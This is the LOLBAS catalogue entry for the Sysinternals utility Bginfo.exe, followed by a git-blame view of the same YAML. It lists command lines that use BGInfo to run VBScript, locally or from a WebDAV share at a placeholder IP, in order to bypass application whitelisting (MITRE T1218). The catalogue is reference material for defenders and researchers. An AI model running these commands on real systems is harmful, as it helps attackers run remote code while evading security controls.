LOLBAS/yml/OtherMSBinaries/Bginfo.yml

---
Name: Bginfo.exe
Description: Background Information Utility included with SysInternals Suite
Author: 'Oddvar Moe'
Created: '2018-05-25'
Commands:
  - Command: bginfo.exe bginfo.bgi /popup /nolicprompt
    Description: Execute VBscript code that is referenced within the bginfo.bgi file.
    Usecase: Local execution of VBScript
    Category: AWL Bypass
    Privileges: User
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows
  - Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
    Usecase: Remote execution of VBScript
    Description: Execute bginfo.exe from a WebDAV server.
    Category: AWL Bypass
    Privileges: User
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows
  - Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
    Usecase: Remote execution of VBScript
    Description: This style of execution may not longer work due to patch.
    Category: AWL Bypass
    Privileges: User
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows
Full Path:
  - No fixed path
Code Sample:
  - Code:
Detection:
  - IOC:
Resources:
  - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
Initial commit - LOLBAS V2.0 2018-06-09 00:15:06 +02:00			`---`
			`Name: Bginfo.exe`
Updated yml for: appvlp and bginfo. 2018-09-19 05:06:22 +02:00			`Description: Background Information Utility included with SysInternals Suite`
			`Author: 'Oddvar Moe'`
Initial commit - LOLBAS V2.0 2018-06-09 00:15:06 +02:00			`Created: '2018-05-25'`
			`Commands:`
			`- Command: bginfo.exe bginfo.bgi /popup /nolicprompt`
			`Description: Execute VBscript code that is referenced within the bginfo.bgi file.`
Updated yml for: appvlp and bginfo. 2018-09-19 05:06:22 +02:00			`Usecase: Local execution of VBScript`
Completed template update of OterMSBinaries 2018-09-22 04:58:00 +02:00			`Category: AWL Bypass`
Updated yml for: appvlp and bginfo. 2018-09-19 05:06:22 +02:00			`Privileges: User`
			`MitreID: T1218`
			`MitreLink: https://attack.mitre.org/wiki/Technique/T1218`
			`OperatingSystem: Windows`
minor adjustments 2018-09-25 02:33:38 +02:00			`- Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt`
Updated yml for: appvlp and bginfo. 2018-09-19 05:06:22 +02:00			`Usecase: Remote execution of VBScript`
Initial commit - LOLBAS V2.0 2018-06-09 00:15:06 +02:00			`Description: Execute bginfo.exe from a WebDAV server.`
Completed template update of OterMSBinaries 2018-09-22 04:58:00 +02:00			`Category: AWL Bypass`
Updated yml for: appvlp and bginfo. 2018-09-19 05:06:22 +02:00			`Privileges: User`
			`MitreID: T1218`
			`MitreLink: https://attack.mitre.org/wiki/Technique/T1218`
			`OperatingSystem: Windows`
minor adjustments 2018-09-25 02:33:38 +02:00			`- Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt`
Updated yml for: appvlp and bginfo. 2018-09-19 05:06:22 +02:00			`Usecase: Remote execution of VBScript`
Initial commit - LOLBAS V2.0 2018-06-09 00:15:06 +02:00			`Description: This style of execution may not longer work due to patch.`
Completed template update of OterMSBinaries 2018-09-22 04:58:00 +02:00			`Category: AWL Bypass`
Updated yml for: appvlp and bginfo. 2018-09-19 05:06:22 +02:00			`Privileges: User`
			`MitreID: T1218`
			`MitreLink: https://attack.mitre.org/wiki/Technique/T1218`
			`OperatingSystem: Windows`
Initial commit - LOLBAS V2.0 2018-06-09 00:15:06 +02:00			`Full Path:`
			`- No fixed path`
minor adjustments 2018-09-25 02:33:38 +02:00			`Code Sample:`
			`- Code:`
			`Detection:`
			`- IOC:`
Initial commit - LOLBAS V2.0 2018-06-09 00:15:06 +02:00			`Resources:`
			`- https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/`
Updated yml for: appvlp and bginfo. 2018-09-19 05:06:22 +02:00			`Acknowledgement:`
			`- Person: Oddvar Moe`
			`Handle: '@oddvarmoe'`